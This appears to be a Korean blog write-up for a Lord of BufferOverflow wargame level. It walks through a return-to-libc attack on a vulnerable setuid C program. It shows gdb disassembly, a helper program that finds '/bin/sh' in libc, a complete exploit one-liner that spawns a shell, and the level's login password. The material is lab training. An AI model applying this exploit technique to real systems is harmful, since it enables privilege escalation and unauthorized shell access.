반응형
login : darkknight
password : new attacker
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
RTL이라는 공격 기법을 이용한다.
전체적인 페이로드는
buffer를 채울 데이터 + system addr + dummy + /bin/sh 주소이다
하나씩 찾아보자
1. system addr
(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>: push %ebp
0x8048431 <main+1>: mov %esp,%ebp
0x8048433 <main+3>: sub $0x2c,%esp
0x8048436 <main+6>: cmpl $0x1,0x8(%ebp)
0x804843a <main+10>: jg 0x8048453 <main+35>
0x804843c <main+12>: push $0x8048500
0x8048441 <main+17>: call 0x8048350 <printf>
0x8048446 <main+22>: add $0x4,%esp
0x8048449 <main+25>: push $0x0
0x804844b <main+27>: call 0x8048360 <exit>
0x8048450 <main+32>: add $0x4,%esp
0x8048453 <main+35>: mov 0xc(%ebp),%eax
0x8048456 <main+38>: add $0x4,%eax
0x8048459 <main+41>: mov (%eax),%edx
0x804845b <main+43>: add $0x2f,%edx
0x804845e <main+46>: cmpb $0xbf,(%edx)
0x8048461 <main+49>: jne 0x8048480 <main+80>
0x8048463 <main+51>: push $0x804850c
0x8048468 <main+56>: call 0x8048350 <printf>
0x804846d <main+61>: add $0x4,%esp
0x8048470 <main+64>: push $0x0
0x8048472 <main+66>: call 0x8048360 <exit>
---Type <return> to continue, or q <return> to quit---
0x8048477 <main+71>: add $0x4,%esp
0x804847a <main+74>: lea 0x0(%esi),%esi
0x8048480 <main+80>: mov 0xc(%ebp),%eax
0x8048483 <main+83>: add $0x4,%eax
0x8048486 <main+86>: mov (%eax),%edx
0x8048488 <main+88>: push %edx
0x8048489 <main+89>: lea 0xffffffd8(%ebp),%eax
0x804848c <main+92>: push %eax
0x804848d <main+93>: call 0x8048370 <strcpy>
0x8048492 <main+98>: add $0x8,%esp
0x8048495 <main+101>: lea 0xffffffd8(%ebp),%eax
0x8048498 <main+104>: push %eax
0x8048499 <main+105>: push $0x8048522
0x804849e <main+110>: call 0x8048350 <printf>
0x80484a3 <main+115>: add $0x8,%esp
0x80484a6 <main+118>: leave
0x80484a7 <main+119>: ret
0x80484a8 <main+120>: nop
0x80484a9 <main+121>: nop
0x80484aa <main+122>: nop
0x80484ab <main+123>: nop
0x80484ac <main+124>: nop
0x80484ad <main+125>: nop
---Type <return> to continue, or q <return> to quit---
0x80484ae <main+126>: nop
0x80484af <main+127>: nop
End of assembler dump.
(gdb) b *main
Breakpoint 1 at 0x8048430
(gdb) r
Starting program: /home/darkknight/test
Breakpoint 1, 0x8048430 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
2. /bin/sh 주소
#include <stdio.h>
#include <string.h>
int main(){
long system = 0x40058ae0;
while (memcmp((void*)system, "/bin/sh\x00", 8)){
system++;
}
printf("Address: %x\n", system);
return 0;
}[darkknight@localhost darkknight]$ vi getaddr.c
[darkknight@localhost darkknight]$ gcc -o getaddr getaddr.c
[darkknight@localhost darkknight]$ ./getaddr
Address: 400fbff9
./bugbear `python -c 'print "\x90"*44 + "\xe0\x8a\x05\x40" + "\x90"*4 + "\xf9\xbf\x0f\x40"'`
new divide
반응형
'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글
| [Lord Of BufferOverFlow] 15번 giant -> assassin (0) | 2021.03.04 |
|---|---|
| [Lord Of BufferOverFlow] 14번 bugbear -> giant (0) | 2021.03.04 |
| [Lord Of BufferOverFlow] 12번 golem -> darkknight (0) | 2021.03.01 |
| [Lord Of BufferOverFlow] 11번 skeleton -> golem (0) | 2021.02.27 |
| [Lord Of BufferOverFlow] 10번 vampire -> skeleton (0) | 2021.02.26 |